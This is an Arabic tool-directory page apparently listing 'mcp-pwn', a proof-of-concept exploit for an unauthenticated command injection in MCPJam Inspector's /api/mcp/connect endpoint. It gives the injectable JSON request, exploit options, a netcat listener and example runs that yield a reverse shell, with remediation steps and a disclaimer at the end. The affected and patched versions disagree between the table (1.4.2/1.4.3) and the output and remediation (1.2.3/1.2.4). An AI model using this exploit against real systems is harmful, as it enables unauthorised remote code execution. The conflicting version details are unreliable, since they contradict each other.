Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
mcp-pwn — استغلال PoC لـ CVE-2026-23744 — RCE غير مصادق عليه في MCPJam Inspector عبر حقن أوامر serverConfig غير موثق على /api/mcp/connect، مما يتيح reverse shell كـ process owner بدون بيانات اعتماد. | Kitploit
أدوات/GitHubGitHub/jf-gondim/mcp-pwn
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليمالفريق الأحمر
GitHubjf-gondim/mcp-pwn

mcp-pwn

استغلال PoC لـ CVE-2026-23744 — RCE غير مصادق عليه في MCPJam Inspector عبر حقن أوامر serverConfig غير موثق على /api/mcp/connect، مما يتيح reverse shell كـ process owner بدون بيانات اعتماد.

عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-23744 — تنفيذ التعليمة البرمجية عن بُعد غير الموثوق في MCPJam

ملخص

MCPJam هي أداة مفتوحة المصدر لمفتش ووكيل MCP (بروتوكول سياق النموذج) تستخدم للاتصال وإدارة وتصحيح خوادم MCP. الإصدارات <= 1.4.2 تعرض نقطة النهاية /api/mcp/connect بدون مصادقة أو التحقق من صحة الإدخال. يمكن لمهاجم عن بُعد غير موثوق حقن أوامر نظام تشغيل تعسفية عبر الحقول serverConfig.command / serverConfig.args، مما يحصل على تنفيذ التعليمات البرمجية عن بُعد بصلاحيات مالك العملية.


تفاصيل الثغرة الأمنية

الحقلالقيمة
معرف CVECVE-2026-23744
درجة CVSS9.8 (حرجة)
متجه CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-78 — تحييد غير صحيح للعناصر الخاصة في أمر نظام تشغيل
المكونمفتش وكيل MCPJam
المتأثرMCPJam <= 1.4.2
المصححMCPJam >= 1.4.3
ناقل الهجومشبكة — لا تتطلب مصادقة
تاريخ الكشف2026-01-15

التحليل الفني

تقبل نقطة النهاية الضعيفة طلب POST بتنسيق JSON غير موثوق:

root@kitploit:~
POST /api/mcp/connect HTTP/1.1
Host: <target>:3000
Content-Type: application/json

{
  "serverConfig": {
    "command": "sh",
    "args": ["-c", "<ATTACKER_CONTROLLED>"],
    "env": {}
  },
  "serverId": "any_string"
}

يمرر MCPJam command و args مباشرة إلى مشغل عملية Node.js (child_process.spawn أو ما يعادله) بدون:

  • التحقق من صحة الإدخال أو السماح بالأوامر
  • فرض المصادقة أو التفويض على نقطة النهاية هذه
  • العزل (sandboxing) أو التقسيم (namespacing) أو خفض الصلاحيات

يمكن للمهاجم الذي يمكنه الوصول إلى المنفذ 3000 (الافتراضي) تقديم حمولة شل عكسية في args[1]، للحصول على شل بصلاحيات مالك عملية MCPJam — غالباً root أو حساب خدمة بصلاحيات وصول واسعة للنظام.

السبب الجذري

غياب وسيط مصادقة وسيط على /api/mcp/connect بالإضافة إلى الاستخدام غير المنضبط للقيم المقدمة من المستخدم في استدعاء spawn لعملية يؤدي إلى حالة حقن أمر نظام تشغيل غير موثوق (CWE-78).


استخدام الاستغلال

المتطلبات

root@kitploit:~
pip install requests urllib3

الوسائط

root@kitploit:~
  -t, --target          عنوان IP أو اسم المضيف المستهدف
  -p, --port            المنفذ المستهدف (افتراضي MCPJam: 3000)
  -l, --lhost           عنوان IP المحلي لاستدعاء الشل العكسية
  -r, --lport           المنفذ المحلي لاستدعاء الشل العكسية
      --timeout         ثوانٍ لانتظار توفر الهدف (افتراضي: 30)
      --shell-timeout   مهلة POST قبل افتراض سقوط الشل (افتراضي: 5)
  -v, --verbose         طباعة جسم استجابة HTTP كاملة

خطوة بخطوة

1. ابدأ مستمع netcat على جهازك:

root@kitploit:~
nc -lvnp 4444

2. شغّل الاستغلال:

root@kitploit:~
# أساسي
python3 exploit.py -t 10.10.11.50 -p 3000 -l 10.10.14.5 -r 4444

# مفصّل + مهلة توفر ممتدة (أهداف بطيئة)
python3 exploit.py -t 10.10.11.50 -p 3000 -l 10.10.14.5 -r 4444 --timeout 60 -v

# مهلة شل أطول (أعطِ مزيداً من الوقت قبل افتراض إنشاء الشل)
python3 exploit.py -t 10.10.11.50 -p 3000 -l 10.10.14.5 -r 9001 --shell-timeout 10

المخرجات المتوقعة

root@kitploit:~
 ╔═══════════════════════════════════════════════════════════════════╗
 ║     MCPJam  ·  تنفيذ تعليمات برمجية عن بُعد غير موثوق عبر حقن serverConfig   ║
 ║                        CVE-2026-23744                             ║
 ╚═══════════════════════════════════════════════════════════════════╝
  معرف CVE      :  CVE-2026-23744
  المكوّن   :  مفتش وكيل MCPJam
  المتأثر    :  <= 1.2.3   →  المصحح: >= 1.2.4
  درجة CVSS  :  9.8 (حرجة)
  متجه CVSS :  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  CWE         :  CWE-78 — حقن أوامر نظام تشغيل
  النوع        :  تنفيذ تعليمات برمجية عن بُعد غير موثوق  (شبكة / لا مصادقة)
  المرجع   :  https://nvd.nist.gov/vuln/detail/CVE-2026-23744

  10:32:01 [*] فحص الهدف 10.10.11.50:3000  (بحد أقصى 30 ثانية) ...
  10:32:02 [+] الهدف نشط — HTTP 200

  10:32:02 [*] نقطة نهاية الاستغلال  : http://10.10.11.50:3000/api/mcp/connect
  10:32:02 [*] استدعاء الشل العكسية  : 10.10.14.5:4444
  10:32:02 [!] تأكد من المستمع   : nc -lvnp 4444
  10:32:02 [*] إطلاق الحمولة    ...

  10:32:07 [+] انتهت مهلة POST بعد 5 ثوانٍ — من المحتمل إنشاء شل عكسية على 10.10.14.5:4444
  10:32:07 [+] انتقل إلى مستمع netcat الخاص بك — يُتوقع اتصال وارد.

  10:32:07 [+] اكتملت روتين الاستغلال.

انتهاء المهلة = مؤشر نجاح. عندما تنتهي مهلة طلب POST، تكون العملية الهدف محظورة على الشل العكسية المفتوحة — هذا هو السلوك المتوقع، مما يؤكد تحقيق تنفيذ التعليمات البرمجية عن بُعد. انتقل فوراً إلى المستمع الخاص بك.


المعالجة


المراجع

  • CVE-2026-23744: تنفيذ تعليمات برمجية عن بُعد في مفتش MCPJam بسبب تعريض نقطة نهاية HTTP
  • NVD — CVE-2026-23744
  • CWE-78: حقن أوامر نظام تشغيل
  • OWASP: حقن الأوامر
  • OWASP Top 10: A03 حقن
  • بروتوكول سياق النموذج — اعتبارات الأمان
  • مشروع MCPJam

إخلاء مسؤولية

يتم توفير هذا الاستغلال بدقة للأغراض التعليمية واختبار الأمان المأذون. استخدمه فقط ضد أنظمة تملكها أو لديك إذن كتابي صريح لاختبارها. الاستخدام غير المأذون غير قانوني وغير أخلاقي.

تنزيل الأداة
الأولويةالإجراء
حرجةتحديث MCPJam إلى >= 1.2.4
عاليةتقييد /api/mcp/connect خلف وسيط مصادقة
عاليةتطبيق قاعدة جدار حماية على مستوى الشبكة لتقييد الوصول إلى منفذ MCPJam بعناوين IP موثوقة
متوسطةالسماح بالقيم المسموح بها فقط لـ serverConfig.command
متوسطةتشغيل MCPJam داخل حاوية / مع مستخدم Linux مقيد (لا شل، لا /dev/tcp)
منخفضةتمكين تسجيل التدقيق على أحداث spawn للعملية